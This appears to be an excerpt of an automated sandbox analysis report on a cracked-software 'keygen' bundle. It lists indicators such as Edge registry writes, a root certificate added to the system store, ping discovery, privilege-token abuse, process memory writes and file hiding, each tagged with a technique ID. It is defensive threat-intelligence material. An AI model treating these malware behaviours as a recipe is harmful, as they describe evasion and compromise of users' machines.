Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{5B2DA445-0AA5-4514-913B-461560BC13DE}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	schtasks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	schtasks.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	schtasks.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	schtasks.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

keygen-step-2.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	keygen-step-2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	keygen-step-2.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

7420 PING.EXE
1436 PING.EXE
3904 PING.EXE
6448 PING.EXE

pid	process
7420	PING.EXE
1436	PING.EXE
3904	PING.EXE
6448	PING.EXE

Script User-Agent 7 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	235	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	240	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	667	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	670	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	684	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	687	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	234	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exesetups.tmpmultitimer.exe

pid	process
4144	chrome.exe
4144	chrome.exe
4688	chrome.exe
4688	chrome.exe
3920	chrome.exe
3920	chrome.exe
4536	chrome.exe
4536	chrome.exe
3036	chrome.exe
3036	chrome.exe
4740	chrome.exe
4740	chrome.exe
796	chrome.exe
796	chrome.exe
4592	chrome.exe
4592	chrome.exe
1436	chrome.exe
1436	chrome.exe
364	chrome.exe
364	chrome.exe
844	setups.tmp
844	setups.tmp
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe
2832	multitimer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

msinfo32.exe

pid process

2352 msinfo32.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

MicrosoftEdgeCP.exe

pid process

2064 MicrosoftEdgeCP.exe
2064 MicrosoftEdgeCP.exe

pid	process
2352	msinfo32.exe

pid	process
2064	MicrosoftEdgeCP.exe
2064	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

Setup.exeaskinstall20.exetaskkill.exemultitimer.exeMicrosoftEdge.exeMicrosoftEdgeCP.exemultitimer.exevpn.tmppowershell.exepowershell.exeRunWW.exe

description	pid	process
Token: SeDebugPrivilege	4036	Setup.exe
Token: SeCreateTokenPrivilege	364	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	364	askinstall20.exe
Token: SeLockMemoryPrivilege	364	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	364	askinstall20.exe
Token: SeMachineAccountPrivilege	364	askinstall20.exe
Token: SeTcbPrivilege	364	askinstall20.exe
Token: SeSecurityPrivilege	364	askinstall20.exe
Token: SeTakeOwnershipPrivilege	364	askinstall20.exe
Token: SeLoadDriverPrivilege	364	askinstall20.exe
Token: SeSystemProfilePrivilege	364	askinstall20.exe
Token: SeSystemtimePrivilege	364	askinstall20.exe
Token: SeProfSingleProcessPrivilege	364	askinstall20.exe
Token: SeIncBasePriorityPrivilege	364	askinstall20.exe
Token: SeCreatePagefilePrivilege	364	askinstall20.exe
Token: SeCreatePermanentPrivilege	364	askinstall20.exe
Token: SeBackupPrivilege	364	askinstall20.exe
Token: SeRestorePrivilege	364	askinstall20.exe
Token: SeShutdownPrivilege	364	askinstall20.exe
Token: SeDebugPrivilege	364	askinstall20.exe
Token: SeAuditPrivilege	364	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	364	askinstall20.exe
Token: SeChangeNotifyPrivilege	364	askinstall20.exe
Token: SeRemoteShutdownPrivilege	364	askinstall20.exe
Token: SeUndockPrivilege	364	askinstall20.exe
Token: SeSyncAgentPrivilege	364	askinstall20.exe
Token: SeEnableDelegationPrivilege	364	askinstall20.exe
Token: SeManageVolumePrivilege	364	askinstall20.exe
Token: SeImpersonatePrivilege	364	askinstall20.exe
Token: SeCreateGlobalPrivilege	364	askinstall20.exe
Token: 31	364	askinstall20.exe
Token: 32	364	askinstall20.exe
Token: 33	364	askinstall20.exe
Token: 34	364	askinstall20.exe
Token: 35	364	askinstall20.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	2516	multitimer.exe
Token: SeDebugPrivilege	4164	MicrosoftEdge.exe
Token: SeDebugPrivilege	4164	MicrosoftEdge.exe
Token: SeDebugPrivilege	4164	MicrosoftEdge.exe
Token: SeDebugPrivilege	4164	MicrosoftEdge.exe
Token: SeDebugPrivilege	4388	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4388	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4388	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4388	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2832	multitimer.exe
Token: SeDebugPrivilege	5580	vpn.tmp
Token: SeDebugPrivilege	5580	vpn.tmp
Token: SeDebugPrivilege	5648	powershell.exe
Token: SeDebugPrivilege	5724	powershell.exe
Token: SeDebugPrivilege	5196	RunWW.exe

Suspicious use of FindShellTrayWindow 52 IoCs

Processes:

chrome.exechrome.exeSetup3310.tmpvpn.tmplayawhdydqp.exeIBInstaller_97039.tmpe2c4myx2qb2.tmpvict.tmp

pid	process
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
4688	chrome.exe
1772	chrome.exe
5152	Setup3310.tmp
1772	chrome.exe
5580	vpn.tmp
5736	layawhdydqp.exe
5848	IBInstaller_97039.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5184	e2c4myx2qb2.tmp
5272	vict.tmp

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

pid process

4164 MicrosoftEdge.exe
2064 MicrosoftEdgeCP.exe
2064 MicrosoftEdgeCP.exe

pid	process
4164	MicrosoftEdge.exe
2064	MicrosoftEdgeCP.exe
2064	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4688 wrote to memory of 4808	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 4808	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3472	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 4144	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 4144	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe
PID 4688 wrote to memory of 3184	4688	chrome.exe	chrome.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

9392 attrib.exe
8284 attrib.exe
4340 attrib.exe
5656 attrib.exe

pid	process
9392	attrib.exe
8284	attrib.exe
4340	attrib.exe
5656	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
